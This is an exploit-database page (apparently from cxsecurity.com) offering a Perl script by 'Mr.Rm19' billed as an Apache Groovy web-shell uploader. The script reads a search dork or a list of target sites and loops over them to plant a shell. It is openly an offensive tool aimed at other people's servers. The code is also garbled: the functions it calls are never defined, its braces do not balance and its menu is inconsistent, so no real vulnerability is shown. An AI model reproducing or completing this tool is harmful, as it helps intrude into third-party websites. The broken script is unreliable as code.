Apache Groovy Upload Shell With Perl

2018.02.09
id Mr.Rm19 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################## #exploit author: Mr.Rm19 #09-02-2018 #Apache Groovy Upload Shell With Perl #DORK: N/A ################################################################################## # POC : # #!/usr/bin/perl #Copyright (c) 2018 - Mr.Rm19 use LWP::UserAgent; use HTTP::Request::Common; use Term::ANSIColor; use HTTP::Request::Common qw(GET); $ag = LWP::UserAgent->new(); $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Mr.Rm19/20010801"); $ag->timeout(10); $list= "list.txt"; if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); } my $datetime = localtime; system("title Mr.Rm19"); if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); } print color('bold green'); print q( __ .gp.__/ .ssSSSSSs.__ d$P^^^" .sSSSSSSS$$$$$$$p.dP .SSSSSS$$$$$SSSSSSSS$bs+._ .SSSS$$$$$SSSSS$$$$$$$SS$$$$b__ /"-. SSS$$$SSSSS$$$$$$$$SSSS$$$SSSS$b _/"-. / :S$$$SSSSS$$$$$$$SSSSS$$$SSSS$$SSb // /"-. $$SSSSS$$$$$$SSSSS$$$$$$S$$$$S$$$Sb. ; / / SSSSS$$$$$SSSSS$$$$$$$SS'P SS$$S`^b._.' /: : / :S$$$$$SSSSS$$$$$$$SSSP :$SS$b / ; +-./ $$$$SSSS$$$$$$$SSSSSP S$SS$; / / / / ; d$$SSS$$$$$SSSSSSSSS' ,=._ :S':S$ / / / / / :$SSS$$$$SSSSSSSSS^" ' _ "; ; S$ / / / / / SSS$$$SSSP.-TSS^" .="$; / S; / / / / / :SS$$$SSS$$ (; " \ P / / / : : :S$$$SS$$$$b : \ .' / / / : \ T$$SS$$$$$j`-, . , \ /"-( / ;_-.\ `TSS$$$$P ; `. `.-' / /\\/ .'/_ ;; TS$$$P : _.-; / /\\( / /-" ;; SSS' \ :-t" : .-\\/ "-/": // .SS$$ `. `-; Mr.Rm19 )Y y / ; J/ :S$$$; "-. ( '"; j_.-/-./.-" \_ $S$SS "j. : :/ ': `-..' \ d$$SS; : / "-._.' `. ; `-./; _S$$$SP \ : \: :"-. \; ,$$$SSSj , `. ; : ; "-, / S$$SS'"^-...___ : "-. ;/ ; t __.-`SS'---. `T$$$$$$q._ "-. / `. / ; .-""__ `.' `. `T$$$$$$$$b. `. : "--" / /.-"" \/ `. T$$$$$$$$$$p. .`._ /"-. _ .' :: / \ T$$$$$SS$$$$$b._ `.T$p. / "" ;-' ;; : \ T$$$S$$$$$$$$$$$p._L$$$$p. / , ;; ; \ $$$$$$$$$$$$$$$$$$$SS$$$$$. / :: ; ;:$$$$$$$$$$$$$$SSSSSSSSS$$$y ' ;; : "^$$$$$$$$$$$$$$$$$SSSS$$$P / ;; b. "^$$$$$$$$$$$$$$$$$S$$' / :: :$$p. -._ "^$$$$$$$$$$$$$$$' / ;; $$$$$p. "^$$$$$$$$$$P / :: :$$$$$$p. "^$$$$$$P , ;; T$$$$$$$$p. "^$$P :: T$$$$$$$P "-. " ' s;; $$$$$$P d$$p._ / / S$$: $$$$$t d$$$$$$$p._ "-. .' / SS$;; :P^"\ \.d$$$$$$$$$$$$p._ "" / TS:: \ d$$$$$$$$$$$$$$$$$$$p._ / SS.\ .jq$$$$$$$$$$$$$$$$$$^^^^^""-._ .'; $$$$.tsssj' `T$$$$$$$^^^^^""" "-._.' ; $$$SSS \ / \ : '^SSS_ \ : : : $$$SS. \ ; : ; '$$$SS \ : ; : "^S$. \ ; : : S$$b. \ ; ; S$$$$ ; : : 'TSS$$$s. : ; ; TS$$Ss_ ; ; : `SSS$$$p./ : ; TS$$' ; ; : "S : ; ; / ; : : / : : /"-. .' ; / ""--..__ __..--"" : """""""""" ); print color('reset'); print " "; print colored ("[ Mr.Rm19 ]",'white on_red'); print colored ("[ Coded By Mr.Rm19 ]\n",'white on_red'); print " "; print colored ("[ Start At $datetime ]",'white on_red'),"\n\n"; print color('bold red'),"["; print color('bold green'),"1"; print color('bold red'),"] "; print color("bold white"),"upload shel? |> yes\n"; print color('bold red'),"["; print color('bold green'),"2"; print color('bold red'),"] "; print color('bold red'),"] "; print color("bold white"),"Choose Number : "; my $targett = <STDIN>; chomp $targett; if($targett eq '1') { print color('bold red'),"["; print color('bold green'),"+"; print color('bold red'),"] "; print color("bold white"),"[Sites? ]\n"; print color('bold red'),"["; print color('bold green'),"+"; print color('bold red'),"] "; print color("bold white"),"Give Me Dork:"; $dork=<STDIN>; chomp($dork); $dork=~s/ /+/g; gassonee(); } if($targett eq '2') { print color('bold red'),"["; print color('bold green'),"+"; print color('bold red'),"] "; { { { { } if($targett eq '3') { print color('bold red'),"["; print color('bold green'),"+"; print color('bold red'),"] "; print color('bold red'),"["; print color('bold green'),"+"; print color('bold red'),"] "; print color("bold white")," Path to your websites list:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die "[-] gAGaL"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; OUTER: foreach $tofuck(@TARGETS){ chomp($tofuck); if($tofuck =~ /http:\/\/(.*)\//) { $tofuck= $1; get(); }else{ get(); } } chomp($list); { { } ; friend : c4ur un!onb4se 008 ./uzumak1 hacker sakit hati w4uw1k 190102 !0nt!5


Vote for this issue:
25%
75%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top